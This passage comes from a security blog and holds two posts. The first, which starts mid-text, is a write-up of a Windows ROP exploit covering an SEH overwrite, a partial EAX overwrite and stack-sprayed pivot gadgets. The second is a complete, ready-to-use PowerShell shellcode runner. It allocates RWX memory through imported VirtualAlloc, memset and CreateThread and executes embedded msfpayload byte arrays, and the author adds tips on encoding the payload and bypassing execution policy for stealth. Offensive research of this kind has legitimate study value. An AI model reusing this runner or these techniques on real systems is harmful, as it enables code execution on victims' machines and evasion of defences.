• The stack was always mapped to the same base address – 0x0017xxxx
• Let’s just say that the virtual function pointer was overwritten at offset 1400 and the SE handler pointer was overwritten at offset 1700

Exploitation

As stated before, I had two angles of attack at my disposal – SEH overwrite and a call to a virtual function pointer. I chose to explore the SEH route first.

When writing a ROP exploit for an SEH overwrite, you need specific gadgets to perform the stack pivot (i.e. get ESP to point to your shellcode). The traditional gadgets that would perform this task are as follows:

• XCHG reg, ESP; RETN 
• MOV  reg, ESP; RETN 
• CALL reg
• POP  reg; JMP reg
• ADD  ESP, offset; RETN

Unfortunately, upon passing control to the SE handler, there were no registers under my control nor were there any registers that pointed to my buffer. The only option left for me was MOV reg, ESP; RETN. The ROP compiler I used found no such gadget, however aside from a lone ADD ESP, 0x0C; RETN which just wasn’t going to cut it since my buffer was approximately 0x800 bytes away from ESP. Originally, I thought that the ADD ESP, 0x0C; RETN gadget might work because it would essentially “walk” down the stack returning to invalid memory addresses along the way until it hit the beginning of my buffer. Then, upon attempting to return to an invalid memory address the SE handler that I overwrote would then kick in and return to itself, continuing to walk the stack. I was naive however and it didn’t work that way. The unhandled exception handler kicked in and I got nowhere.

I tried to get creative with gadgets. For example, I thought that I might be able to find a ROP variation to the classic pop-pop-ret instruction sequence:

POP reg
POP reg
POP ESP  <-- this would point to the beginning of my ROP chain
RETN

Alas, I found no such gadget. So I decided to shift my attention to the call to the virtual function pointer – CALL DWORD PTR [EAX+A0].

At the time of the crash, I had full control over EAX. Also, ESI and EDI contained pointers to my buffer in the stack. [EAX+A0] is a pointer to a function pointer, however so you would need to find an interesting pointer to a pointer within the DLL that I was targeting. I found no address in the DLL. I needed a pointer to a pointer that I could control. Solution: the buffer that I controlled on the stack. The problem was that the stack was mapped to 0x0017xxxx which contains a null – one of the bad characters. I mentioned that the function pointer was overwritten at offset 1400. So the solution to getting EAX to point to the stack was a partial EAX overwrite.

After running the process in WinDbg and tracing calls to CALL [EAX+A0], I observed that all calls were being made from the stack – 0x0017xxxx. Due to the little-endian nature of the Intel architecture, that means that overwriting EAX with just three bytes would allow EAX to point to any address with a null high-order byte – i.e. 0x00414141.

Upon crashing, I noticed that my buffer reliably resided within a range of approximately 0x40 bytes. So at this point, I was dealing with the following:

• Ability to point EAX to the stack using a partial EAX overwrite
• A buffer that shifted slightly at each crash but only within a range of about 0x40 bytes.

So now I potentially had a range of addresses that I could “spray” with pointers to a stack pivot gadget. Since the sprayed addresses reside in the stack, I guess you could call this method stack-spraying ;D. I found a few XCHG EAX, ESP; RETN gadgets and got them to execute reliably but there was a problem, however. Executing a stack pivot twice “unpivots” the stack and you’re back to where you were when you started. After many hours of banging my head on the desk I realized that I could use a series of alternating gadgets to only execute the stack pivot once then jump to a series of ROP-NOPs that jumped over the remaining stack pivot gadgets. I tried my best to illustrate this concept in the following diagram:

Fortunately, upon executing CALL [EAX+A0], the program reliably landed on one of the stack pivot gadgets – Gadget1. Gadget 1 then returned to Gadget 2. The purpose of Gadget 2 is to walk the stack while jumping over Gadget 1. I then added a few ROP-NOPs - &RETN followed by the primary ROP chain, which eventually called VirtualProtect(). Utilizing these techniques ultimately resulted in an extremely reliable exploit.

Conclusion

Just because the solution isn’t staring you in the face doesn’t mean it’s not there. Finding specific ROP gadgets can be like trying to find a needle in the haystack. With enough patience, persistence, and a good ROP compiler at your disposal, you’ll be well on your way to popping shells in the modern world.

Future Work

I would really like to get the ADD ESP, 0x0C; RETN gadget to work. I thought it might work if I overwrote the pointer to the next SEH handler with 0xFFFFFFFF, marking my crafted handler as the last in the chain and thus the handler of last resort. This wasn’t the case though. If anyone has successfully used this method to walk the stack down the attacker-controlled buffer I would love to hear how you accomplished it.

Exploiting Powershell's Features (Not Flaws)

tl;dr version

Using the features built in to Microsoft Powershell one can execute arbitrary shellcode. The method described in this post is both 32 and 64 bit compatible. Because we are exploiting the features of the .NET framework, ASLR and DEP doesn't even come into play here. Just copy and paste your shellcode and you're good to go.

lengthy, pedantic version

Those us that use Powershell know just how powerful it can be in automating administrative tasks. However, with great power comes great responsibility and the Powershell developers certainly assumed that it would be used responsibly. Unfortunately, (get ready for another clichéd expression/pun) absolute power corrupts absolutely. ;D I'll show you how you can use Powershell's integrated features to execute arbitrary shellcode.

Powershell's true power comes in the form of access to the .NET framework. One of the greatest features of Powershell, IMHO is the ability to add custom classes to the .NET framework. This can be accomplished using the Add-Type cmdlet. The great thing about Add-Type is that it will compile CSharp code on the fly for you. Why is this so great? It allows you to import functions from any DLL. The Add-Type documentation provides some pretty good examples on how to create your own classes using CSharp source code.

It's pretty easy to import a function from a DLL. You just have to alter the C-style function prototype a bit to a CSharp-style prototype. Since we'll be importing the VirtualAlloc function later, I'll use it as an example.

Here's what the VirtualAlloc C-style prototype would look like:

LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

Here's what it would look like in CSharp:

IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

Finally, here's how you would be able to reference VirtualAlloc in Powershell:

PS ># import VirtualAlloc function from kernel32.dll
PS >$code = @"
PS >[DllImport("kernel32.dll")]
PS >public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
PS >"@
PS ># add VirtualAlloc to the winFunc class
PS >$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
PS ># allocate a page of memory
PS >$x=$winFunc::VirtualAlloc(0,0x1000,0x1000,0x40)

The .NET framework doesn't deal too well with directly referencing memory. For security reasons, this is a good thing. However, since you can import functions that deal with unmanaged memory, we should in theory have all the tools necessary to allocate executable memory, copy shellcode to it, and then execute it as a thread. So without further ado, let's do just that in Powershell. The following code will execute any arbitrary 32 or 64 bit payload within Powershell. All you have to do is copy and paste the relevant 32 and 64 bit payloads and the code will determine on the fly if it is running in a 32 vs. 64 bit context. And because it's copy and paste, it should be popular with the skiddies. ;D

<#
Powershell Code Execution 'Exploit'
Author: Matthew Graeber
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
#>

# Import required functions
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@

# Add CSharp code as a class recognized by Powershell
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru

# Copy and paste your shellcode here in the form 0xXX.
# 32-bit payload
# msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread
[Byte[]]$sc32 = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00

# 64-bit payload
# msfpayload windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread
[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00

# Determine if Powershell is running as 32 or 64 bit
[Byte[]]$sc = $sc32
if ([IntPtr]::Size -eq 8) {$sc = $sc64}

# Calculate correct size param for VirtualAlloc
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}

# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000.
# Allocate RWX memory block
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)

# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}

# Execute you payload
$winFunc::CreateThread(0,0,$x,0,0,0)

As you can see in the Powershell script, I'm doing a few things:

1) Importing the VirtualAlloc, CreateThread, and memset methods and adding them to my 'winFunc' class
2) Inserting both the 32 and 64 bit payloads as byte arrays
3) Determining whether PS is running as 32 vs. 64 bit by using the [IntPtr]::Size property
4) Allocating enough memory to accommodate the shellcode
5) Copying the shellcode to the executable region of memory
6) Executing the shellcode in its own thread

Here are some pretty pictures:

Popping a calc on 32-bit Powershell

Popping a calc on 64-bit Powershell

Now if you wanted to be even more stealthy in executing this attack, you could base64 encode the entire payload and execute it using the '-encodedCommand' option in PS. You could take this one step further and execute the encoded payload within a batch file thus bypassing the Powershell execution policy. I'll spare you details on how to accomplish this since this method is already well documented.

Lastly, I am by no means a CSharp developer or even a developer for that matter so you can certainly spare me any criticisms of my poor coding practices. The bottom line is, it works and it works extremely reliably and that's all I care about. Also, there's absolutely more than one way to accomplish this. I would love to hear suggestions on alternate ways to execute shellcode from within Powershell. And please feel free to leave comments and questions below. Enjoy!